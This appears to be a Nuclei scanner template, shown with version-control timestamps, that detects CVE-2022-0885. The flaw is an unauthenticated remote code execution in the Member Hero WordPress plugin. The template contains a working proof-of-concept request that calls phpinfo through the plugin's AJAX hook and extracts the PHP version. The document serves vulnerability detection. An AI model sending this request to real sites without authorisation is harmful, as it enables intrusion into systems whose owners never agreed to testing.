2022-10-20 09:44:28 +00:00
id : CVE-2022-0885
info :
2022-10-20 11:55:38 +00:00
name : Member Hero <= 1.0.9 - Unauthenticated Remote Code Execution
2022-10-20 09:44:28 +00:00
author : theamanrawat
severity : critical
description : |
The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.
reference :
- https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df
- https://wordpress.org/plugins/member-hero/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0885
classification :
2022-10-21 10:57:05 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-10-20 09:44:28 +00:00
cve-id : CVE-2022-0885
2022-10-21 10:57:05 +00:00
cwe-id : CWE-94
2022-10-20 09:44:28 +00:00
metadata :
2022-10-21 10:57:05 +00:00
verified : "true"
tags : unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,cve,cve2022
2022-10-20 09:44:28 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"
2022-10-20 11:55:38 +00:00
matchers-condition : and
2022-10-20 09:44:28 +00:00
matchers :
- type : word
words :
2022-10-20 11:55:38 +00:00
- "PHP Extension"
- "PHP Version"
condition : and
- type : status
status :
- 200
extractors :
- type : regex
part : body
group : 1
regex :
- '>PHP Version <\/td><td class="v">([0-9.]+)'